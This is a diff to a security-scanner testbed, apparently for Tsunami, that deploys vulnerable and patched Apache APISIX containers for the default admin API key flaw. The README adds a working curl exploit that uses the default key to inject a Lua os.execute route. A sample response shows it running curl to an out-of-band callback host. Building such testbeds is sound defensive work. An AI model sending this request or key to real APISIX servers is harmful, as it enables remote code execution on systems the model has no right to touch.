Apisix defaultapitoken templated

apache/apisix/defaultapitoken/README.md

@@ -3,8 +3,36 @@
 
 This directory contains the deployment configs for an Apache APISIX installation
 Apache APISIX has a built-in default API KEY. If the user does not proactively modify it (which few will), Lua scripts
-can be executed directly through the API interface, which can lead to RCE vulnerabilities.
+can be executed directly through the API interface, which can lead to RCE vulnerabilities. Normally, the admin API endpoints are restricted by the client IP address, but this tests for a case where other IP addresses have been allowed. See the `allow_admin` part of the configuration files.
 
-You can start the vulnerable service by running the command `docker compose up -d`. The deployed container has name `apache-apisix-defaul-api-token` and listens on port `9080`.
+You can start both the vulnerable service and safe service by running the command `docker compose up -d`. The vulnerable container listens on port `8081`, and the safe container listens on port `8082`.
 
-The container that is not affected by the vulnerability is `apache-apisix-defaul-api-token-safe`, you can start it with `docker compose -f docker-compose-safe.yml up -d`, and the service listens on port `9081`.
+In this case, the vulnerable service uses APISIX with the default API key, and the safe service uses APISIX with a changed API key using the `config_api_key_change.yml` file.
+
+## Testing the vulnerability
+
+Run the following command, replacing `YOUR_COMMAND_HERE` with the command you want to execute (this won't be executed from this curl command alone, you need to execute the route too): 
+```
+curl -X PUT "http://localhost:8081/apisix/admin/routes/tsunami_rce?ttl=30" \
+  -H "X-API-KEY: edd1c9f034335f136f87ad84b625c8f1" \
+  -H "Content-Type: application/json" \
+  -d '{
+    "uri": "/test/anything",
+    "upstream": {
+      "type": "roundrobin",
+      "nodes": {}
+    },
+    "name": "anything",
+    "filter_func": "function(vars) return os.execute(\"YOUR_COMMAND_HERE\")==true end"
+  }'
+```
+
+Vulnerable Response:
+```
+{"action":"set","lease_id":"7587895458205140304","node":{"value":{"update_time":1781195535,"filter_func":"function(vars) return os.execute(\"curl 132ovru87ms15vti1jl0vw77gymparyg.burpserver.doyentesting.com\")==true end","priority":0,"id":"tsunami_rce","name":"anything","create_time":1781195535,"uri":"\/test\/anything","status":1,"upstream":{"scheme":"http","type":"roundrobin","hash_on":"vars","pass_host":"pass","nodes":{}}},"key":"\/apisix\/routes\/tsunami_rce"}}
+```
+
+Safe Response:
+```
+{"error_msg":"failed to check token"}
+```

apache/apisix/defaultapitoken/docker-compose.yml

@@ -1,17 +1,68 @@
 services:
-  apache-apisix-defaul-api-token:
-    image: apache/apisix:2.11.0-alpine
+  apache-apisix-default-api-token-vuln:
+    image: apache/apisix:2.13.0-alpine
+    platform: linux/amd64
     restart: unless-stopped
     ports:
-      - "9080:9080"
+      - "8081:9080"
     volumes:
       - ./config_default.yml:/usr/local/apisix/conf/config.yaml:ro
     depends_on:
-      - etcd
-  etcd:
-    image: bitnami/etcd:3.4.15
+      etcd-vuln:
+        condition: service_healthy
+    networks:
+      vuln:
+        aliases: 
+          - apisix
+  apache-apisix-default-api-token-safe:
+    image: apache/apisix:2.13.0-alpine
+    platform: linux/amd64
+    restart: unless-stopped
+    ports:
+      - "8082:9080"
+    volumes:
+      - ./config_api_key_change.yml:/usr/local/apisix/conf/config.yaml:ro
+    depends_on:
+      etcd-safe:
+        condition: service_healthy
+    networks:
+      safe:
+        aliases: 
+          - apisix
+  etcd-vuln:
+    image: bitnamilegacy/etcd:3.4.15
+    environment:
+      ETCD_ENABLE_V2: "true"
+      ALLOW_NONE_AUTHENTICATION: "yes"
+      ETCD_ADVERTISE_CLIENT_URLS: "http://0.0.0.0:2379"
+      ETCD_LISTEN_CLIENT_URLS: "http://0.0.0.0:2379"
+    healthcheck:
+      test: ["CMD", "curl", "-sf", "http://localhost:2379/health"]
+      interval: 5s
+      timeout: 3s
+      retries: 10
+    networks:
+      vuln:
+        aliases: 
+          - etcd
+  etcd-safe:
+    image: bitnamilegacy/etcd:3.4.15
     environment:
       ETCD_ENABLE_V2: "true"
       ALLOW_NONE_AUTHENTICATION: "yes"
       ETCD_ADVERTISE_CLIENT_URLS: "http://0.0.0.0:2379"
       ETCD_LISTEN_CLIENT_URLS: "http://0.0.0.0:2379"
+    healthcheck:
+      test: ["CMD", "curl", "-sf", "http://localhost:2379/health"]
+      interval: 5s
+      timeout: 3s
+      retries: 10
+    networks:
+      safe:
+        aliases: 
+          - etcd
+networks:
+  safe:
+    driver: bridge
+  vuln:
+    driver: bridge